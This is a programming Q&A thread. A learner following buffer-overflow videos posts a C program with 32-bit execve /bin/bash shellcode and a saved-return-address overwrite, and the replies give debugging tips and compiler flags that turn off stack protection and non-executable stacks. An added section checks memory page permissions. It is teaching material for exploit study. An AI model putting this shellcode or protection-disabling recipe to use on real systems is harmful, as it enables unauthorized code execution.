
I'm trying to learn about buffer overflows on my Ubuntu 12.04 32-bit machine by following along with the videos at http://www.securitytube.net/groups?operation=view&groupId=4 . Currently, I'm on part 5, which injects some relocatable code to generate a bash shell via execve.

I can get the Shellcode.c to build just fine, using gcc -mpreferred-stack-boundary=2 -o Shellcode Shellcode.c as it shows in the part 5 video. However, when I run the C code, all I get is Segmentation Fault (core dumped). I do not get a bash shell spawned like it shows in the video.

Can anyone tell me why I'm not spawning a bash shell like the demo shows? My gut is telling me that this is because I am using a later version kernel (no idea what is used in the demo).

Thanks!

Code follows:

Shellcode.c

#include <stdio.h>

/* 32-bit Linux execve shellcode from the video: a jmp/call pair locates the
   trailing "/bin/bash" string, then int 0x80 invokes the system call. */
char shellcode[] = "\xeb\x18\x5e\x31\xc0\x88\x46\x09\x89\x76\x0a"
                   "\x89\x46\x0e\xb0\x0b\x89\xf3\x8d\x4e\x0a\x8d\x56\x0e"
                   "\xcd\x80\xe8\xe3\xff\xff\xff\x2f\x62\x69\x6e\x2f\x62"
                   "\x61\x73\x68\x41\x42\x42\x42\x42\x43\x43\x43\x43";


int main(void){

        int *ret;

        /* Two words above ret's own stack slot is main's saved return
           address (32-bit x86, -mpreferred-stack-boundary=2, no stack protector). */
        ret = (int *)&ret + 2;

        /* Overwrite the saved return address so that main "returns" into the shellcode buffer. */
        (*ret) = (int)shellcode;

        return 0;
}
  • There are two main possibilities: either your shell code is incorrect, or you didn't overwrite the return address on the stack correctly. You need to know what the shell code does (or is supposed to do). Maybe the address of `execv` is in it — but the address has changed on your machine. – Jonathan Leffler Feb 12 '15 at 15:46
  • Put a 0xcc byte at the beginning and run it in gdb. If it doesn't cause a breakpoint, it means you aren't even *starting* the shellcode. 0xcc is the interrupt 3 instruction (trap to debugger) and is very useful when writing exploits and/or shellcode – adam Jul 01 '17 at 14:01
  • Also note it's possible that your BSS section isn't executable and is set rw- only. Upon execution, you would get a SIGSEGV for that as well – adam Jul 01 '17 at 14:03

1 Answer

My friend, make sure you compile it correctly.

If it is 32-bit shellcode, which is very likely because \xcd\x80 is there.

And make sure the stack is executable and no stack protector is there:

gcc -m32 -o a Shellcode.c -fno-stack-protector -z execstack
./a

This should give you a shell if your shellcode is right.

If not, run gdb a to step through and find which part is wrong.

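Both the answer (compile with -z execstack) and adam's comment (the data section may be rw- only) point at the same diagnosis: the segfault happens because the page holding the shellcode bytes is not executable, not because the bytes are wrong. The following check is an added example, not code from the question, the answer or the SecurityTube videos. It reads the process's own /proc/self/maps (Linux only; on other systems it reports "unknown") and prints the permissions of the mapping that contains a given address, so you can confirm whether a global byte array or the stack is actually executable under a given set of compiler flags. The byte array sample_bytes is a constructed, harmless placeholder (two NOPs and a ret), not the question's payload.

```c
#include <stdio.h>
#include <stdint.h>
#include <string.h>

/* Constructed sample: a global byte array in .data, the same kind of
   storage the question keeps its shellcode in. Contents are harmless. */
char sample_bytes[] = "\x90\x90\xc3";

/*
 * Look up the mapping that contains addr in /proc/self/maps.
 * Returns 1 if that mapping is executable, 0 if it is not, and -1 if no
 * mapping was found or /proc/self/maps could not be read (non-Linux).
 * If perms is non-NULL, the four-character permission string (e.g. "rw-p")
 * is copied into it.
 */
int page_is_executable(uintptr_t addr, char perms[5]) {
    FILE *f = fopen("/proc/self/maps", "r");
    if (!f) return -1;

    char line[512];
    int result = -1;
    while (fgets(line, sizeof line, f)) {
        unsigned long start, end;
        char p[5] = {0};
        /* Each line starts with "start-end perms ..." in hex. */
        if (sscanf(line, "%lx-%lx %4s", &start, &end, p) != 3) continue;
        if (addr >= start && addr < end) {
            if (perms) { memcpy(perms, p, 4); perms[4] = '\0'; }
            result = (p[2] == 'x') ? 1 : 0;
            break;
        }
    }
    fclose(f);
    return result;
}

static void report(const char *what, uintptr_t addr) {
    char perms[5] = "----";
    int r = page_is_executable(addr, perms);
    printf("%-12s at 0x%08lx: %s (%s)\n", what, (unsigned long)addr,
           r == 1 ? "executable" : r == 0 ? "NOT executable" : "unknown",
           r >= 0 ? perms : "no /proc/self/maps");
}

int main(void) {
    int stack_var = 0;
    report("code", (uintptr_t)page_is_executable);   /* .text: expect r-x */
    report("sample_bytes", (uintptr_t)sample_bytes); /* .data: expect rw- by default */
    report("stack", (uintptr_t)&stack_var);          /* stack: rw- unless -z execstack */
    return 0;
}
```

Build it once with plain gcc and once with `gcc -z execstack`; the stack line changes from rw-p to rwxp, while the .data line containing sample_bytes stays rw-p either way. That is why jumping into a global char array faults on a default-hardened toolchain even with the correct bytes, and why the answer's step of confirming the flags comes before debugging the shellcode itself.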